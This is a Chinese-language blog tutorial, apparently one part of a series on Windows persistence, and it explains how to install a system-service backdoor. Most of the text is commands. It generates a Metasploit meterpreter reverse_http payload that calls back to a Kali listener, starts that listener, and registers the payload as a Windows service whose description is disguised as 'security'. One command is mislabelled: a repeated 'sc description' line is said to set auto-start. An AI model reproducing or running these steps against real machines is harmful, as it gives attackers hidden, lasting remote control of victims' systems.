系列文章
操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
系统服务维持后门
系统服务
能够创建在操作系统自己的 Windows 会话中可长时间运行的可执行应用程序。这些服务可以在计算机启动时自动启动,可以暂停和重新启动而且不显示任何用户界面
创建服务:
sc命令
用法: sc create [service name] [binPath= ] ...
1、创建服务
sc create shell start= auto binPath= "C:\shell.exe" obj= Localsystem
2、查看服务是否已经创建
services.msc
3、修改正常的名称和描述
sc description "shell" "安全"
4、启动服务
net start "服务名"
系统服务后门
机器名 | IP |
---|---|
kali | 192.168.52.130 |
win10 | 192.168.52.131 |
生成msf木马文件
msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe
我们将我们的恶意文件上传到目标服务器上
kali机器开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run
创建名字为test的自启动服务命令:
sc create "test" binpath= "C:\Users\Administart\Desktop\shell.exe"
sc description "test" "test" #设置服务的描述字符串
sc description "test" "test" #设置这个服务为自动启动
net start "test" #启动服务
kali机器收到监听会话